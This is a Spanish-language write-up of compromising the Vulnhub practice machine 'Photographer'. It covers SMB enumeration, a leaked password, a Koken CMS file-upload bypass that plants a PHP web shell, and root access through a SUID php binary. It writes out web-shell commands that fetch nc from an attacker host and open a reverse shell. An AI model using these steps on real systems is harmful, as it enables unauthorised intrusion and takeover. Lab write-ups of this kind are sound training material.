[Vulnhub] - Photographer

Hoy vamos a hackear la maquina de Vulnhub llamada Photographer. Podeis descargarla desde el siguiente enlace: Photographer

Video


Enumeration


Empezamos con un nmap para ver que puertos tiene abiertos.

~ > nmap -A -p- 192.168.1.80                                                  
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-27 03:04 CEST
Nmap scan report for photographer.home (192.168.1.80)
Host is up (0.00035s latency).
Not shown: 65531 closed ports
PORT     STATE SERVICE     VERSION
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Photographer by v1n1v131r4
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8000/tcp open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: Koken 0.22.24
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: daisa ahomi
Service Info: Host: PHOTOGRAPHER

Host script results:
|_clock-skew: mean: 21h20m17s, deviation: 2h18m34s, median: 20h00m17s
|_nbstat: NetBIOS name: PHOTOGRAPHER, NetBIOS user: , NetBIOS MAC: 
 (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: photographer
|   NetBIOS computer name: PHOTOGRAPHER\x00
|   Domain name: \x00
|   FQDN: photographer
|_  System time: 2020-07-27T17:04:34-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-07-27T21:04:33
|_  start_date: N/A

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.58 seconds
Tras mirar los servicios abiertos, empezamos mirando el Samba. Echamos un vistazo a ver si esta compartiendo alguna carpeta.

~ > smbclient -L 192.168.1.80                                                     
Enter WORKGROUP\sml's password: 

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	sambashare      Disk      Samba on Ubuntu
	IPC$            IPC       IPC Service (photographer server (Samba, 
Ubuntu))
SMB1 disabled -- no workgroup available
Nos conectamos a la carpeta sambashare.

~ > smbclient \\\\192.168.1.80\\sambashare
Enter WORKGROUP\sml's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Tue Jul 21 03:30:07 2020
  ..                                  D        0  Tue Jul 21 11:44:25 2020
  mailsent.txt                        N      503  Tue Jul 21 03:29:40 2020
  wordpress.bkp.zip                   N 13930308  Tue Jul 21 03:22:23 2020

		278627392 blocks of size 1024. 264268400 blocks available
Vemos que tiene un par de ficheros. Nos descargamos el mailsent.txt

smb: \> get mailsent.txt
getting file \mailsent.txt of size 503 as mailsent.txt (163,7 KiloBytes/sec) 
(average 163,7 KiloBytes/sec)
Vemos su contenido.

~ > cat mailsent.txt 
Message-ID: <4129F3CA.2020509@dc.edu>
Date: Mon, 20 Jul 2020 11:40:36 -0400
From: Agi Clarence 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.1) 
Gecko/20020823 Netscape/7.0
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: Daisa Ahomi 
Subject: To Do - Daisa Website's
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Hi Daisa!
Your site is ready now.
Don't forget your secret, my babygirl ;)
Del texto que aparece, podemos sacar un posible login "daisa", las direcciones de correo daisa@photographer.com y por ultimo el "babygirl" que tiene toda la pinta de ser un password :) Seguimos explorando los servicios, en este caso el puerto 8000.

~ > dirb http://192.168.1.80:8000 /usr/share/wordlists/dirb/big.txt -f

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Jul 27 03:10:10 2020
URL_BASE: http://192.168.1.80:8000/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt
OPTION: Fine tunning of NOT_FOUND detection

-----------------

GENERATED WORDS: 20458                                                         

---- Scanning URL: http://192.168.1.80:8000/ ----
+ http://192.168.1.79:8000/.bash_history (CODE:302|SIZE:0)                                            
+ http://192.168.1.79:8000/.bashrc (CODE:302|SIZE:0)                                                    
+ http://192.168.1.79:8000/.cvs (CODE:302|SIZE:0)                                                      
+ http://192.168.1.79:8000/.cvsignore (CODE:302|SIZE:0)                                               
+ http://192.168.1.79:8000/.forward (CODE:302|SIZE:0)                                                 
+ http://192.168.1.79:8000/access_log.1 (CODE:302|SIZE:0)                                             
==> DIRECTORY: http://192.168.1.80:8000/admin/                                                        
==> DIRECTORY: http://192.168.1.80:8000/app/                                                       
+ http://192.168.1.80:8000/asdfjkl; (CODE:301|SIZE:0)  
+ http://192.168.1.80:8000/cgi-bin/ (CODE:302|SIZE:0)
---SNIP---
Vemos que hay una carpeta "admin". Al conectarnos a http://192.168.1.80:8000/admin/ nos pide credenciales. Usaremos: daisa@photographer.com/babygirl Ya estamos dentro :) Buscamos su hay algun exploit para Koken y encontramos el siguiente[1]. Hay que crear un fichero x.php.jpg, hacer el upload e intercerptarlo con burp para modificar el nombre del fichero para quitarle la extension .jpg. Empezamos por crear el fichero.

~ > nano image.php.jpg

Ejecutamos burp para interceptar la request cuando hagamos el upload. En el dashboard de Koken, hacemos Import content y seleccionamos el fichero que acabamos de crear. Interceptamos la request, y quitamos el .jpg del nombre. Una vez enviada la peticion modificada, quitamos el Burp, nos ponemos encima de "Download" file en el dashboard de Koken para ver donde esta el fichero subido. Podemos ver que esta en la siguiente url: http://192.168.1.80:8000/storage/originals/09/0e/image.php Usando el parametro "cmd", nos decargaremos desde nuestra maquina el nc, le daremos permisos de ejecucion, y lanzaremos una reverse shell. Ponemos nc a la escucha:

~ > nc -nlvp 5555
Y usamos el parametro "cmd" para obtener la reverse shell usando el nc que nos descargamos de nuestra maquina.

http://192.168.1.80:8000/storage/originals/09/0e/image.php?cmd=wget 
http://192.168.1.111/nc -O /tmp/nc
http://192.168.1.80:8000/storage/originals/09/0e/image.php?cmd= chmod 777 
/tmp/nc
http://192.168.1.80:8000/storage/originals/09/0e/image.php?cmd /tmp/nc -e 
/bin/bash 192.168.1.111 5555

Low Shell



~ > nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.1.111] from (UNKNOWN) [192.168.1.79] 55916
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@photographer:/var/www/html/koken/storage/originals/71/5c$

user.txt


Miramos si vemos algo interesante.

www-data@photographer:/home$ ls
agi  daisa  lost+found
www-data@photographer:/home$ cd daisa
www-data@photographer:/home/daisa$ cat user.txt
d41d8cd98f00b204e9800998ecf8427e
Exploramos el sistema para ver si encontramos algo que nos ayude a escalar privilegios.

Privilege Escalation



www-data@photographer:/tmp$ find / -perm -4000 2>/dev/null
---SNIP---
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/oxide-qt/chrome-sandbox
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/sbin/pppd
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/php7.2
---SNIP---
Vemos que /usr/bin/php7.2 tiene el SUID activado. Lo utilizamos para escalar privilegios :)

www-data@photographer:/tmp$ export CMD="/bin/sh"
www-data@photographer:/tmp$ /usr/bin/php7.2 -r "pcntl_exec('/bin/sh', ['-p']);" 
                       
# id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)

proof.txt



# cd /root
# ls
proof.txt
# cat proof.txt
                                   
                                .:/://::::///:-`                                
                            -/++:+`:--:o:  oo.-/+/:`                            
                         -++-.`o++s-y:/s: `sh:hy`:-/+:`                         
                       :o:``oyo/o`. `      ```/-so:+--+/`                       
                     -o:-`yh//.                 `./ys/-.o/                      
                    ++.-ys/:/y-                  /s-:/+/:/o`                    
                   o/ :yo-:hNN                   .MNs./+o--s`                   
                  ++ soh-/mMMN--.`            `.-/MMMd-o:+ -s                   
                 .y  /++:NMMMy-.``            ``-:hMMMmoss: +/                  
                 s-     hMMMN` shyo+:.    -/+syd+ :MMMMo     h                  
                 h     `MMMMMy./MMMMMd:  +mMMMMN--dMMMMd     s.                 
                 y     `MMMMMMd`/hdh+..+/.-ohdy--mMMMMMm     +-                 
                 h      dMMMMd:````  `mmNh   ```./NMMMMs     o.                 
                 y.     /MMMMNmmmmd/ `s-:o  sdmmmmMMMMN.     h`                 
                 :o      sMMMMMMMMs.        -hMMMMMMMM/     :o                  
                  s:     `sMMMMMMMo - . `. . hMMMMMMN+     `y`                  
                  `s-      +mMMMMMNhd+h/+h+dhMMMMMMd:     `s-                   
                   `s:    --.sNMMMMMMMMMMMMMMMMMMmo/.    -s.                    
                     /o.`ohd:`.odNMMMMMMMMMMMMNh+.:os/ `/o`                     
                      .++-`+y+/:`/ssdmmNNmNds+-/o-hh:-/o-                       
                        ./+:`:yh:dso/.+-++++ss+h++.:++-                         
                           -/+/-:-/y+/d:yh-o:+--/+/:`                           
                              `-///////////////:`                               
                                                                                

Follow me at: http://v1n1v131r4.com

d41d8cd98f00b204e9800998ecf8427e

End


Y con esto ya seriamos root de la maquina [1] https://www.exploit-db.com/exploits/48706